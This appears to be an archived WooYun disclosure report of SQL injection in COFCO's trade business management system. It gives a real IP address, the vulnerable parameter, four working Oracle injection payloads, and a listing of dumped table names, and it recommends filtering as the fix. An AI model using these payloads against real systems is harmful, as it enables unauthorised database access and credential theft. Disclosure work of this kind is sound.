乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-04: 细节已通知厂商并且等待厂商处理中 2015-08-04: 厂商已经确认,细节仅向厂商公开 2015-08-14: 细节向核心白帽子及相关领域专家公开 2015-08-24: 细节向普通白帽子公开 2015-09-03: 细节向实习白帽子公开 2015-09-18: 细节向公众公开
rt
中粮贸易业务管理系统:http://219.143.252.178/,存在sql注入漏洞,通过注入可以脱库获取到800多个表的信息,可以获取到大量用户和密码等敏感信息。
注入点:http://219.143.252.178/verifiADCode_do.jsp?pwd=135791&username=admin注入点是username
Parameter: username (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pwd=135791&username=admin' AND 3189=3189 AND 'xpOs'='xpOs Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH) Payload: pwd=135791&username=admin' AND 3287=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(120)||CHR(118)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3287=3287) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113))) AND 'oDSL'='oDSL Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: pwd=135791&username=admin' AND 2674=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'WiyK'='WiyK Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: pwd=135791&username=admin' UNION ALL SELECT CHR(113)||CHR(120)||CHR(118)||CHR(122)||CHR(113)||CHR(89)||CHR(113)||CHR(98)||CHR(116)||CHR(80)||CHR(88)||CHR(86)||CHR(107)||CHR(81)||CHR(66)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113),NULL FROM DUAL--
通过注入可查看数据库相关信息
当前库为TRADE_BUSINESS,可以跑出800多个表
+-------------------------------+| BG_REPORTPACT_SUB1 || BG_REPORTPACT_SUB2 || BG_REPORTPACT_SUB3 || BG_REPORTPACT_SUB4 || LMB2015-6-3_JOB || ZJ_AFFIRM_SUB || APPLOG || AQ_CHECKLOG || BANK_EVEN_NO || BB_CONTROL || BB_CONTROL_DESC || BB_CONTROL_LIST || BB_CONTROL_PART_DATE || BB_CONTROL_WEEK_DATE || BB_DAILY_FDYK_1 || BB_DAILY_FDYK_2 || BB_DAILY_FDYK_YEAR_1 || BB_DAILY_FDYK_YEAR_2 || BB_DAILY_GXC_LEADER || BB_DAILY_GXC_LEADER_1 || BB_DAILY_GXC_LEADER_2 || BB_DAILY_GXC_LEADER_CK || BB_DAILY_GXC_LEADER_GROUP_01 || BB_DAILY_GXC_LEADER_JZCK || BB_DAILY_GXC_LEADER_RK || BB_DAILY_GXC_LEADER_SH || BB_DAILY_GXC_LEADER_YEAR || BB_DAILY_GXC_LEADER_YEAR_1 || BB_DAILY_GXC_LEADER_YEAR_2 || BB_DAILY_GXC_LEADER_Y_CK || BB_DAILY_GXC_LEADER_Y_JZCK || BB_DAILY_GXC_LEADER_Y_RK || BB_DAILY_GXC_LEADER_Y_SH || BB_DAILY_GXC_LEAD_Y_GROUP_01 || BB_DAILY_GXC_WORK || BB_DAILY_GXC_WORK_3 || BB_DAILY_GXC_WORK_4 || BB_DAILY_GXC_WORK_CK || BB_DAILY_GXC_WORK_GROUP_01 || BB_DAILY_GXC_WORK_JZCK || BB_DAILY_GXC_WORK_RK || BB_DAILY_GXC_WORK_SH || BB_DAILY_GXC_WORK_YEAR || BB_DAILY_GXC_WORK_YEAR_3 || BB_DAILY_GXC_WORK_YEAR_4 || BB_DAILY_GXC_WORK_Y_ALL_ADD || BB_DAILY_GXC_WORK_Y_CK || BB_DAILY_GXC_WORK_Y_GROUP_01 || BB_DAILY_GXC_WORK_Y_JZCK || BB_DAILY_GXC_WORK_Y_JZCK_ADD || BB_DAILY_GXC_WORK_Y_RK || BB_DAILY_GXC_WORK_Y_SH || BB_DAILY_JTC || BB_DAILY_JTC_1 || BB_DAILY_JTC_2 || BB_DAILY_JTC_3 || BB_DAILY_JTC_4 || BB_DAILY_JTC_GR || BB_DAILY_JTC_GR_ADD || BB_DAILY_JTC_XS || BB_DAILY_JTC_XS_ADD || BB_DAILY_JTC_YEAR || BB_DAILY_JTC_YEAR_1 || BB_DAILY_JTC_YEAR_2 || BB_DAILY_JTC_YEAR_3 || BB_DAILY_JTC_YEAR_4 || BB_DAILY_JTC_YEAR_ADD || BB_DAILY_JTC_Y_GR || BB_DAILY_JTC_Y_GR_ADD || BB_DAILY_JTC_Y_XS |。。。。| ZJ_PAYMENT_FLOW_LOG || ZJ_PAYMENT_FLOW_LOG_DEL || ZJ_PAYMENT_ROWS || ZJ_PAYMENT_SUB || ZJ_PAYMENT_SUB1 || ZJ_PAYMENT_SUBFLOW || ZJ_PLANAPPROVAL || ZJ_PLANAPPROVAL_LOG || ZJ_PLANAPPROVAL_SUB1 || ZJ_PLANAPPROVAL_SUB2 || ZJ_REFDETAILS || ZJ_REFUND || ZJ_REFUNDQUEREN || ZJ_REFUNDQUEREN_SUB || ZJ_RETURN || ZJ_RETURN_SUB || ZJ_TEMPORARY || ZJ_TEMPORARY_LOG || ZJ_TEMPORARY_SUB || ZJ_TEMPORARY_SUB2 || ZJ_TEMPORARY_SUB3 || ZJ_TRANSFERACCOUNT || ZJ_UNPAIREDSETTLEMENT || ZJ_UNPAIREDSETTLEMENT_SUB || ZJ_ZHUANZHANGSQ || ZJ_ZHUANZHANG_SUB1 || ZJ_ZHUANZHANG_SUB2 || CBSHIP || CK_AMOUNT || KH_CUSTOMTMP |+-------------------------------+
跑了其中的OU_USER表做了验证
做好过滤
危害等级:高
漏洞Rank:20
确认时间:2015-08-04 10:11
非常感谢!
暂无
